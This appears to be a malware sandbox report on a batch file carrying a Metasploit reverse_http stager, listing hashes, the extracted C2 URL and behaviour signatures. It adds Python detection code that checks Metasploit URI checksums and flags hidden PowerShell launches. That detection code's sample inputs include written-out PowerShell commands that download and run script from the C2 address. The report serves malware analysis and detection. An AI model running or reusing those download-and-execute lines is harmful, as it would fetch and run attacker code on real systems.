General

  • Target

    Trial2.bat

  • Size

    7KB

  • Sample

    240922-mhhb3svdjc

  • MD5

    d73df76a7d5d41df1d142a0c19c79b55

  • SHA1

    c7b38ae31d4126a59f997d0482c05916bf5c1bb7

  • SHA256

    5839d7d67a82e7c93deafb5807391b3a0e12ab31b154cd3f8a7ff3318c14bd0b

  • SHA512

    60f9c71aa1415b2cc98e900deecdfc5af2b5aab9ae162b91eabb832cf3d9e31afad1524f651884ab960b1c86b1bed34cb30ebc3cde3a70dab59a5f6811acbc44

  • SSDEEP

    192:+n2jh1hqT25k3YuH7khy35gwIpzwaks8ip0B2dHhW:+n2jh1hsV3YA77JgwIh9kVP4dHhW

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://89.197.154.116:7810/mvwulwd81SULrQqsbU_9bQuOBCYQThonLjgcbDpQLZGAV-nrYVywa1G3r1ADsgXd8uRPi_Av0kPjniop2p2pjII4ZZWMxMi
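
The C2 above is a Metasploit reverse_http stager URI. The handler does not serve just any path: it strips the leading slash, takes the first path element and computes an 8-bit checksum over it (Rex::Text.checksum8, the byte sum modulo 256), and only a handful of fixed values are accepted (the Rex::Payloads::Meterpreter::UriChecksum constants: 92 for a Windows/native stager, 80 for Python, 88 for Java, 98 for an existing-session reconnect). msfvenom builds the path as a 22-character URL-safe base64 session UUID plus random alphanumerics, retried until the checksum lands on the target value. The following Python is an added example, not part of this report and not Metasploit's code, that applies that check to the extracted URL; the checksum constants are Metasploit's, while the URL list is constructed here. For this report's path the checksum comes out at 92, the Windows/native value, which agrees with the windows/reverse_http family shown above.

```python
import re
from urllib.parse import urlsplit

# checksum8 values the Metasploit HTTP(S) handler accepts for a stager or
# session URI (constants in Rex::Payloads::Meterpreter::UriChecksum).
MSF_URI_CHECKSUMS = {
    92: "INITW/INITN (Windows or other native stager)",
    80: "INITP (Python stager)",
    88: "INITJ (Java stager)",
    98: "INIT_CONN (reconnect of an existing session)",
}
UUID_PREFIX_LEN = 22                              # URL-safe base64 of the 16-byte session UUID
URI_CHARSET = re.compile(r"^[A-Za-z0-9_-]+$")     # UUID chars plus rand_text_alphanumeric

# Constructed sample input: the C2 URL extracted in this report plus benign traffic.
SAMPLE_URLS = [
    "http://89.197.154.116:7810/mvwulwd81SULrQqsbU_9bQuOBCYQThonLjgcbDpQLZGAV-nrYVywa1G3r1ADsgXd8uRPi_Av0kPjniop2p2pjII4ZZWMxMi",
    "https://example.com/index.html",
    "https://cdn.example.com/assets/app.bundle.min.js?v=42",
]


def checksum8(s: str) -> int:
    """Rex::Text.checksum8: sum of the byte values, modulo 256."""
    return sum(s.encode("utf-8")) % 256


def first_path_segment(url: str) -> str:
    """The handler ignores leading slashes and checksums the first path element;
    the query string is not part of the checksummed resource."""
    return urlsplit(url).path.lstrip("/").split("/", 1)[0]


def classify_uri(url: str) -> dict:
    """Checksum verdict for one URL, in the shape a triage script would log."""
    seg = first_path_segment(url)
    cs = checksum8(seg)
    kind = MSF_URI_CHECKSUMS.get(cs)
    # msfvenom output is at least 5 chars and drawn only from this charset
    # (UUID in URL-safe base64, then random alphanumerics); anything else is
    # a checksum collision from ordinary traffic, not a generated stager URI.
    generated_shape = len(seg) >= 5 and URI_CHARSET.match(seg) is not None
    match = kind is not None and generated_shape
    return {
        "segment": seg,
        "checksum8": cs,
        "msf_match": match,
        "kind": kind if match else None,
        # In UUID mode the first 22 characters encode the session UUID.
        "uuid_b64": seg[:UUID_PREFIX_LEN] if match and len(seg) >= UUID_PREFIX_LEN else None,
    }


def scan(urls):
    """URLs whose first path segment checksums to a Metasploit handler value."""
    return [u for u in urls if classify_uri(u)["msf_match"]]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = classify_uri(u)
        print(f"{r['checksum8']:3d} {r['kind'] or '-':45} {u}")
```

Four accepted values out of 256 means a random alphanumeric path collides about 1.6% of the time, so treat a hit as a triage filter over proxy or NetFlow-enriched logs rather than a verdict: the report's URL also has the other traits of a generated stager URI (raw IP host, non-standard port, no file extension, a long run of alphanumerics), and the session UUID prefix is the same across every request of one implant, which lets you group beacons.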

Targets

    • Target

      Trial2.bat

    • MetaSploit

      Detected a malicious payload that is part of the Metasploit Framework, likely generated with msfvenom or a similar tool.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.
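
The hidden-window signature above corresponds to the -WindowStyle Hidden switch of powershell.exe (powershell.exe accepts any prefix of a switch name, so -w hidden is the common spelling), usually paired with -EncodedCommand, whose argument is base64 of UTF-16LE script text. The following Python is an added example, not part of this report, that parses PowerShell command lines as they appear in process-creation telemetry, decodes -EncodedCommand and flags hidden-window launches that carry a URL or an encoded script. The sample command lines are constructed for the example around the report's C2 URL; the report does not show the exact command the .bat runs, and the value matching for -WindowStyle is deliberately permissive (abbreviations of "hidden" and the numeric ProcessWindowStyle value 1) because a detection should err toward catching variants.

```python
import base64
import re

TOKEN_RE = re.compile(r'"[^"]*"|\S+')                 # keep a quoted argument as one token
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
PS_EXES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}


def _switch(tok: str, full: str) -> bool:
    """powershell.exe accepts any prefix of a switch name (-w, -win, -WindowStyle);
    compare case-insensitively after stripping the - or / prefix."""
    t = tok.lstrip("-/").lower()
    return bool(t) and full.startswith(t)


def encode_command(script: str) -> str:
    """What an attacker does to build an -EncodedCommand argument: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(b64: str) -> str:
    return base64.b64decode(b64.strip('"')).decode("utf-16-le")


def analyze_powershell_cmdline(cmdline: str) -> dict:
    toks = TOKEN_RE.findall(cmdline)
    exe = toks[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower() if toks else ""
    r = {"is_powershell": exe in PS_EXES, "hidden_window": False,
         "encoded": False, "script": None, "urls": [], "suspicious": False}
    if not r["is_powershell"]:
        return r
    for i in range(1, len(toks)):
        tok, nxt = toks[i], (toks[i + 1] if i + 1 < len(toks) else "")
        if not tok.startswith(("-", "/")):
            continue
        if _switch(tok, "windowstyle"):
            # Permissive on purpose: 'hidden', any abbreviation of it, or the
            # numeric ProcessWindowStyle value 1 all count as a hidden window.
            v = nxt.lower()
            r["hidden_window"] = bool(v) and ("hidden".startswith(v) or v == "1")
        elif _switch(tok, "encodedcommand"):          # -e / -ec / -enc / -EncodedCommand
            r["encoded"] = True
            try:
                r["script"] = decode_encoded_command(nxt)
            except (ValueError, UnicodeDecodeError):
                r["script"] = None                    # malformed payload; still flag as encoded
        elif _switch(tok, "command"):                 # -c / -Command "<script>"
            r["script"] = nxt.strip('"')
    found = URL_RE.findall(cmdline) + (URL_RE.findall(r["script"]) if r["script"] else [])
    r["urls"] = list(dict.fromkeys(found))            # de-duplicate, keep order
    r["suspicious"] = r["hidden_window"] and (r["encoded"] or bool(r["urls"]))
    return r


def scan(cmdlines):
    """Indices of the command lines the analyzer flags."""
    return [i for i, c in enumerate(cmdlines) if analyze_powershell_cmdline(c)["suspicious"]]


# Constructed sample input modelled on what this report's signatures describe
# (the .bat's real command line is not shown in the report); the URL is the
# C2 extracted above.
C2 = "http://89.197.154.116:7810/mvwulwd81SULrQqsbU_9bQuOBCYQThonLjgcbDpQLZGAV-nrYVywa1G3r1ADsgXd8uRPi_Av0kPjniop2p2pjII4ZZWMxMi"
STAGER = f"IEX (New-Object Net.WebClient).DownloadString('{C2}')"
SAMPLE_CMDLINES = [
    f"powershell.exe -nop -w hidden -ep bypass -e {encode_command(STAGER)}",
    f'powershell.exe -NoProfile -WindowStyle Hidden -Command "{STAGER}"',
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -nop -c "iwr http://89.197.154.116:7810/ -UseBasicParsing"',
    "cmd.exe /c dir",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        r = analyze_powershell_cmdline(c)
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["urls"], c[:70])
```

Quoted arguments are kept as single tokens so that a `-eq` inside a -Command script is not mistaken for a switch, and the exe name is reduced to its basename so a full System32 path is still recognised. The decoded script is returned so the same pass can feed a second-stage check (the C2 URI checksum test, for instance) without re-decoding.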

MITRE ATT&CK Enterprise v15

Tasks